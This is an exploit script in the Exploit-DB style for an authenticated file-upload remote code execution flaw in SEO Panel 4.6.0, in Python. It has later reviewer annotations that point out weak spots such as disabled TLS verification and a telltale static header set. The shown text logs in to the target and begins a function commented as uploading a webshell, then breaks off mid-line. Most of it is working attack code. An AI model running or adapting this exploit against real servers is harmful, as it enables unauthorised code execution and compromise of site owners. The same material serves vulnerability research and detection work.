[webapps] SEO Panel 4.6.0 - Remote Code Execution (2)

[webapps] SEO Panel 4.6.0 - Remote Code Execution (2)
# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution (2)
# Date: 22 Jan 2021
# Exploit Author: Kr0ff
# Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/
# Software Link: https://www.seopanel.org/spdownload/4.6.0
# Version: 4.6.0
# Tested on: Ubuntu 20.04

#!/usr/bin/env python3

'''
DESCRIPTION:
    - SeoPanel 4.6.0 vulnerable to Remote Code Execution via authenticated file upload

FIXED:
    - ver 4.7.0

AUTHOR:
    - Kr0ff
'''
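#https://asciiart.website/index.php?art=animals/bats

# sys is imported outside the guarded block so the handler below can always
# report the failure and stop.
import sys

try:
    import requests
    import argparse
    from termcolor import colored
    from time import sleep
except ImportError as e:
    # The original handler called colored() here, which is itself unbound when
    # termcolor is the missing module (NameError), and then let the script run
    # on without its dependencies. Report in plain text and exit instead.
    print(f"[ERROR]: {e}", file=sys.stderr)
    sys.exit(1)


def arty():
    """Print the script's ASCII-art banner to stdout.

    The banner text is kept exactly as it appears on the page; its original
    line layout was lost when the listing was flattened.
    """
    artz = """ HAPPY HALLOWEEN ! ....._ `. ``-. .-----.._ `, `-. .: /` : `".. ..-`` : / ...--:::`n n.`::... : `:`` .` :: / `. ``---..:. ` .` ._: .-: :: `. .-`` : : :_\_/: : .:: `. / : / -../:/_.`-` : :: _.._ q` p ` /` | :-` ``(_. ..-----hh``````/-._: `: `` / ` E: / : _/ : _..-`` l--``
---------------------------------------------------------- _ ___ ___ ___ ___ __ ___ ___| |___ ___ ___
|_ -| -_| . | . ||. | | -_| | _| _| -_|
|___|___|___| _|___|_|_|___|_|_| |___|___| |_| 4.6.0 @Kr0ff
----------------------------------------------------------
"""
    print(artz)


#Initialize requests to create a session
# A requests session keeps cookies between the calls made through `r`.
r = requests.session()

#Create a login for the user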
def login(TARGET, USER, PASS):
    """Submit the login form to ``{TARGET}/login.php`` and return the cookie header.

    The request goes through the module-level session ``r``. The HTTP status
    code is printed, and the value of the response's ``Set-Cookie`` header is
    returned (``None`` when the header is absent).

    NOTE(review): the only check made is ``status_code == 200``. Nothing here
    inspects the response body, so "[SUCCESS]" does not by itself show that the
    credentials were accepted.

    NOTE(review): ``verify=False`` disables TLS certificate validation, so the
    password is sent without authenticating the server.

    NOTE(review): every request from this function carries the same static
    header set (Firefox 82 on macOS User-Agent, ``DNT: 1``,
    ``Connection: close``). In web-server logs for login.php that is a weak
    indicator only, since it is trivially changed.
    """
    form_fields = {
        "sec": "login",
        "red_referer": f"{TARGET}",
        "userName": f"{USER}",
        "password": f"{PASS}",
        "login": "",
    }
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }

    response = r.post(
        f"{TARGET}/login.php",
        headers=request_headers,
        data=form_fields,
        verify=False,
    )

    status = response.status_code
    if status != 200:
        print(colored("[FAILURE]", "red"), f"Status code for login.php -> {status}\n")
        print("Please check if you are providing the right path to 'seopanel' or if server is live...")
    else:
        print(colored("[SUCCESS]", "green"), f"Status code for login.php -> {status}\n")

    return response.headers.get("Set-Cookie")


#Upload the webshell to target server
def exploit(TARGET, USER, PASS): login(TARGET, USER, PASS) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml; ..
